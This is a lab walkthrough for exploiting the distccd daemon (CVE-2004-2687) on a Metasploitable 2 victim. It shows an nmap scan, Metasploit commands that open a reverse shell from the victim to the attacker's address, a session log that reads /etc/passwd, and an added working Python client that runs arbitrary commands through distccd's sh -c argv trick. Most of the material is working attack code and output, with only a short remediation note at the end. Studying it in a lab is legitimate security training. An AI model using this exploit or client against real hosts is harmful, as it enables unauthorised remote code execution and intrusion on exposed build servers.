
Metasploit-exploit/unix/misc/distcc_exec

Test Setting

Victim : 192.168.8.144

Attacker : 192.168.8.135



1. First, scan the victim from Kali with nmap to find the exposed services. Note that the port range below stops at 65000; use -p- if you want all 65535 ports.

# nmap -sV -sS -p1-65000 192.168.8.144


root@kali:~# nmap -sV -sS -p1-65000 192.168.8.144



Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-06 18:56 EST

Nmap scan report for 192.168.8.144

Host is up (0.000082s latency).

Not shown: 64970 closed ports

PORT      STATE SERVICE     VERSION

21/tcp    open  ftp         vsftpd 2.3.4

22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

23/tcp    open  telnet      Linux telnetd

25/tcp    open  smtp        Postfix smtpd

53/tcp    open  domain      ISC BIND 9.4.2

80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)

111/tcp   open  rpcbind     2 (RPC #100000)

139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

512/tcp   open  exec        netkit-rsh rexecd

513/tcp   open  login?

514/tcp   open  shell       Netkit rshd

1099/tcp  open  rmiregistry GNU Classpath grmiregistry

1524/tcp  open  shell       Metasploitable root shell

2049/tcp  open  nfs         2-4 (RPC #100003)

2121/tcp  open  ftp         ProFTPD 1.3.1

3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5

3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

5900/tcp  open  vnc         VNC (protocol 3.3)

6000/tcp  open  X11         (access denied)

6667/tcp  open  irc         Unreal ircd

6697/tcp  open  irc         Unreal ircd

8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)

8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1

8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)

34716/tcp open  status      1 (RPC #100024)

40576/tcp open  unknown

43521/tcp open  nlockmgr    1-4 (RPC #100021)

53327/tcp open  mountd      1-3 (RPC #100005)

MAC Address: 00:0C:29:C7:C8:FB (VMware)

Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 157.61 seconds



2. Exploit distccd (port 3632) with Metasploit

distccd accepts compile jobs from any client that can reach the port, without authentication, and the 2.x daemon runs whatever "compiler" name the client puts in argv (CVE-2004-2687). The exploit/unix/misc/distcc_exec module sends a fake compile request whose argv is sh -c <payload>, so the daemon executes the payload as the distccd user. Start PostgreSQL for the Metasploit database first, then run the module:

#service postgresql start

#msfconsole

> search distccd

  exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

> use exploit/unix/misc/distcc_exec

> set rhost 192.168.8.144

> set payload cmd/unix/reverse

> set lhost 192.168.8.135

> options

> exploit


The cmd/unix/reverse payload (Double Reverse TCP, telnet) makes the victim open two connections back to LHOST, one used for input and one for output; the "double handler" echoes a random token through both to work out which is which:

msf exploit(distcc_exec) > exploit


[*] Started reverse TCP double handler on 192.168.8.135:4444 

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo 4TILbdljh58U7Rw0;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "4TILbdljh58U7Rw0\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (192.168.8.135:4444 -> 192.168.8.144:59463) at 2017-02-06 21:12:16 -0500


The session is a plain command shell with no prompt; type commands directly. It runs as the distccd service account (daemon on Metasploitable 2), not root, so anything beyond reading world-readable files needs a separate privilege escalation step:

ifconfig
cat /etc/passwd
...
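To show what the module does on the wire, here is an added example written for this page (it is not code from the original post and not Metasploit's distcc_exec.rb): a minimal Python client for the distcc request/response protocol that builds the same sh -c argv trick, plus a parser for the daemon's reply tokens. The victim address and port are taken from the lab setup above; the sample reply used in the comments is constructed, not captured.

```python
"""
Minimal distcc protocol client (added example, not the post's or Metasploit's code).

A distcc 2.x request is a sequence of tokens, each 4 ASCII letters followed by
8 lowercase hex digits (the value or a byte length), optionally followed by that
many bytes of body:

    DIST<version> ARGC<n> ARGV<len><arg> ... DOTI<len><preprocessed source>

The daemon answers with DONE<version> STAT<exit status> SERR<len><stderr>
SOUT<len><stdout> DOBJ<len><object file>.
"""
import socket

VICTIM_HOST = "192.168.8.144"   # from the lab setup in the post (assumption: still reachable)
DISTCC_PORT = 3632


def token(name: bytes, value: int) -> bytes:
    """Encode one distcc token: 4-byte name + 8 hex digits."""
    if len(name) != 4:
        raise ValueError("distcc token names are exactly 4 bytes")
    return name + b"%08x" % value


def build_request(argv, source: bytes = b"") -> bytes:
    """Serialise a compile request for the given argv and (optional) source body."""
    req = token(b"DIST", 1) + token(b"ARGC", len(argv))
    for arg in argv:
        a = arg.encode()
        req += token(b"ARGV", len(a)) + a
    # distccd writes this body to a temp .i file; it is irrelevant when argv[0] is sh.
    req += token(b"DOTI", len(source)) + source
    return req


def exec_argv(cmd: str):
    """
    distccd 2.x only accepts argv that looks like a compile (a '-c <src>' and
    '-o <obj>'), but it does not verify argv[0] is a compiler.  Putting the
    command behind 'sh -c' and leaving the compiler flags after it as harmless
    positional parameters ($0, $1, ...) satisfies the check while running cmd.
    This mirrors the argv layout the Metasploit module uses.
    """
    return ["sh", "-c", cmd, "#", "-c", "main.c", "-o", "main.o"]


def parse_response(data: bytes) -> dict:
    """Walk the reply tokens and collect exit status, stdout, stderr and object bytes."""
    out = {"stat": None, "stdout": b"", "stderr": b"", "obj": b""}
    i = 0
    while i + 12 <= len(data):
        name = data[i:i + 4]
        n = int(data[i + 4:i + 12], 16)
        i += 12
        if name in (b"DONE", b"STAT"):
            # DONE carries the protocol version, STAT the exit status; no body.
            if name == b"STAT":
                out["stat"] = n
            continue
        body = data[i:i + n]
        i += n
        if name == b"SOUT":
            out["stdout"] += body
        elif name == b"SERR":
            out["stderr"] += body
        elif name == b"DOBJ":
            out["obj"] += body
    return out


def run_remote(cmd: str, host: str = VICTIM_HOST, port: int = DISTCC_PORT,
               timeout: float = 10.0) -> dict:
    """Send the request and return the parsed reply (network; not used by the offline test)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(exec_argv(cmd)))
        buf = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return parse_response(buf)


if __name__ == "__main__":
    # Example: the command's stdout comes back in the SOUT token, so a plain
    # "id" is enough to confirm execution and see which account distccd runs as.
    print(run_remote("id"))
```

Because stdout is returned inside the SOUT token, a single request is enough to confirm the vulnerability without any reverse connection; the Metasploit payload is only needed for an interactive shell. The fix on the server side is the usual one for distcc: do not expose 3632 beyond the build network, and start distccd with --allow restricted to the clients that need it.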